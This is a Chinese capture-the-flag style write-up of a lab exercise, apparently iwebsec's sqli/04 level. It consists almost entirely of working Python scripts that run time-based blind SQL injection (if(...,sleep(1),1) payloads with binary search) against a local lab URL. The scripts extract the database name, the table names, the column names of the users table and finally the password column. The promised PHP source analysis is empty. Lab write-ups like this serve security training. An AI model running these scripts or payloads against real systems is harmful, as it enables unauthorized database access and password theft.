目录

• 一、解题过程
• • （一）观察页面
  • （二）编写脚本逐项获取数据
  • • 1.获取数据库名的长度（可不做）
    • 2.获取数据库名（可不做）
    • 3.获取表名
    • 4.获取users表的列名
    • 5.获取password列的数据
• 二、源码分析
• • （一）php源码
  • 关键脚本

一、解题过程

（一）观察页面

发现不论输入的payload正确与否，页面输出是一样的，所以不能bool注入

（二）编写脚本逐项获取数据

1.获取数据库名的长度（可不做）

#encoding=utf-8
import requests
import os
import time

url="http://192.168.182.130:8001/sqli/04.php"

def DbLen():
	for i in range(1,10):
		payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
		req_url=url+payload
		start_time=time.time()
		rep=requests.get(url=req_url)
		end_time = time.time()
		t = end_time - start_time
		if t > 1:
			print("DB length is "+str(i))
DbLen()

2.获取数据库名（可不做）

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

5.获取password列的数据

def GetData():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

二、源码分析

（一）php源码

关键脚本